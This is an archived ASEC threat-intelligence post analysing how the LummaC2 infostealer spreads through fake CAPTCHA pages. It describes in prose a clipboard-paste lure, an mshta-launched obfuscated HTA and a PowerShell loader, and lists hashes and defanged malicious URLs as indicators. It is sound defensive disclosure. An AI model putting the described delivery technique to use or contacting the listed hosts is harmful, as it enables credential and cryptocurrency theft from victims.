Infostealer LummaC2 Spreading Through Fake CAPTCHA
Verification Page - ASEC
By ATCP
Published: 2025-01-07 · Archived: 2026-04-05 18:57:35 UTC
AhnLab SEcurity intelligence Center (ASEC) previously introduced the DarkGate malware which spreads using
the paste function in a blog post.
Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V)
The distribution method in this case initially involved spreading malware through HTML attachments disguised as
MS Word files in phishing emails. However, LummaC2 has been recently identified as spreading through a fake
CAPTCHA verification page.
1. Distribution Channel
When accessing the initial distribution page, a familiar authentication screen is displayed as shown below.
Clicking the “I’m not a robot” button on the page copies a command that connects to a malicious URL to the
clipboard.
https://asec.ahnlab.com/en/85699/
Page 1 of 6

Figure 1. A fake CAPTCHA verification page
The threat actor explains a fake authentication step to trick users into executing the command copied to the
clipboard using shortcut keys.
Figure 2. The code that copies a command to the clipboard
2. Obfuscated HTA File
The command uses the “mshta.exe” process to execute a file (web44.mp4) containing a malicious script from a
malicious URL. The file contains content unrelated to the mp4 extension and is obfuscated, which makes it
difficult to recognize it as a script. Although extracting the file’s strings can reveal the script, it is also obfuscated.
https://asec.ahnlab.com/en/85699/
Page 2 of 6

Figure 3. (Left: the original web44.mp4 file/Right: A script file revealed through string extraction from
web44.mp4)
3. PowerShell Script Loader
The HTA file ultimately executes a PowerShell script. The executed PowerShell script is also encrypted with AES.
Figure 4. AES-decrypted script
The AES-obfuscated PowerShell script downloads and executes an additional PowerShell script (web.png).
https://asec.ahnlab.com/en/85699/
Page 3 of 6

Figure 5. The PowerShell script (web.png) executing LummaC2
4. LummaC2
The malware that is ultimately executed is LummaC2, capable of stealing information such as browser data and
cryptocurrencies.
Figure 6. LummaC2 communicating with C2
“hwid” is the unique identifier for the infected PC, and a number from 1 to 3 is assigned to “pid” according to the
type of information that is stolen. “lid” is presumed to be the Lumma ID and is most likely used as the distributed
malware’s campaign identifier. Detailed information about LummaC2 can be found in the blog post below.
New Infostealer LummaC2 Being Distributed Disguised As Illegal Cracks
https://asec.ahnlab.com/en/85699/
Page 4 of 6

In addition, LummaC2 utilizes a module called ClipBanker, which monitors the clipboard and changes copied
cryptocurrency wallet addresses to the threat actor’s wallet address.
Figure 7. ClipBanker
5. Conclusion
LummaC2 distributed through fake CAPTCHA pages is mainly spread via crack program download pages or
phishing emails. Users should be especially cautious when dealing with emails or websites of unclear origin.
MD5
3099830291f5dfb199b1f6649997fb45
3734e365ab10e73a85320916ba49c3ee
https://asec.ahnlab.com/en/85699/
Page 5 of 6

af46bc7df8441c09296666f0053fb000
e7677ec2ca8706708bcd64b7b8e7111d
Additional IOCs are available on AhnLab TIP.
URL
https[:]//cc[.]klipjaqemiu[.]shop/web[.]png
https[:]//klipjaqemiu[.]shop/web44[.]mp4
https[:]//noisercluch[.]click/api
Additional IOCs are available on AhnLab TIP.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click
the banner below.
Source: https://asec.ahnlab.com/en/85699/
https://asec.ahnlab.com/en/85699/
Page 6 of 6